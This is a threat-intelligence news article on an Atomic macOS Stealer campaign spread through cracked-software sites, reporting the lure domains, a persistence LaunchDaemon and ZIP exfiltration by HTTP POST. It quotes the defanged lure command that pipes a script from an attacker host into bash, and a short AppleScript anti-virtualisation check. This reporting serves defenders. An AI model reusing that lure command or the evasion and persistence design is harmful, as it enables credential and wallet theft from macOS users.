Atomic Stealer Disguised as Cracked Software Attacking macOS Users

A sophisticated malware campaign targeting macOS users has emerged, exploiting the widespread desire for free software to deliver the notorious Atomic macOS Stealer (AMOS).

This information-stealing malware masquerades as cracked versions of popular applications, tricking unsuspecting users into compromising their own systems while believing they are simply downloading free software alternatives.

The campaign represents a significant shift in the cybersecurity landscape, challenging the long-held perception that macOS devices are inherently safer than their Windows counterparts.

As Apple devices gain popularity among professionals and high-value targets, cybercriminals have adapted their tactics to capitalize on this growing market.

The attackers demonstrate remarkable sophistication by employing multiple distribution methods and continuously rotating their infrastructure to evade detection.

The malware’s reach extends far beyond simple data theft, targeting sensitive information including browser credentials, cryptocurrency wallets, Telegram conversations, VPN configurations, keychain data, Apple Notes, and various document files.

This comprehensive approach to data collection makes AMOS particularly dangerous for both individual users and enterprise environments, where compromised credentials can lead to broader organizational breaches.

Trend Micro researchers identified this campaign through their Managed Detection and Response services, noting the malware’s ability to bypass traditional security measures through social engineering rather than technical exploits.

The analysis revealed that attackers primarily distribute AMOS through websites like haxmac.cc, which hosts numerous cracked macOS applications and serves as the initial infection vector.

The distribution strategy involves redirecting users through a complex network of rotating domains including dtxxbz1jq070725p93[.]cfd, goipbp9080425d4[.]cfd, and im9ov070725iqu[.]cfd.

These redirectors eventually lead victims to landing pages hosted on domains such as ekochist.com, misshon.com, and toutentris.com, where they encounter two primary installation methods.

Terminal-Based Installation and Persistence Mechanisms

The most successful distribution method involves instructing users to execute malicious commands directly in the macOS Terminal application.

This approach proves particularly effective because it bypasses Apple’s Gatekeeper security feature, which normally prevents unsigned applications from running.

Users are presented with seemingly innocuous commands like:-

curl - fsSL https[:]//goatramz[.]com/get4/install[.]sh | bash

Once executed, this command downloads and runs an installation script that performs several critical operations.

The script first downloads an AppleScript file named “update” to the temporary directory, which then conducts anti-virtualization checks to avoid detection in sandboxed environments:-

set memData to do shell script "system_profiler SPMemoryDataType"
if memData contains "QEMU" or memData contains "VMware" then```  set exitCode to 100
else
    set exitCode to 0
end if

The malware establishes persistence through a sophisticated multi-component system involving three key files. The primary stealer binary (.helper) performs the actual data collection, while a monitoring script ([.]agent) runs continuously to detect user login sessions.

A LaunchDaemon configuration file (com[.]finder[.]helper[.]plist) ensures the malware survives system reboots by automatically launching the monitoring script at startup.

The persistence mechanism creates an infinite loop where the .agent script continuously monitors for active user sessions and executes the .helper binary in the appropriate user context.

This design ensures consistent operation while maintaining a low profile, as the malware operates through legitimate system processes and avoids creating obvious indicators of compromise.

Data exfiltration occurs through compressed ZIP archives sent via HTTP POST requests to command-and-control servers, with custom headers containing unique identifiers for each infected system.

The malware’s comprehensive data collection capabilities, combined with its sophisticated evasion and persistence mechanisms, make it a formidable threat to macOS users who download software from untrusted sources.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.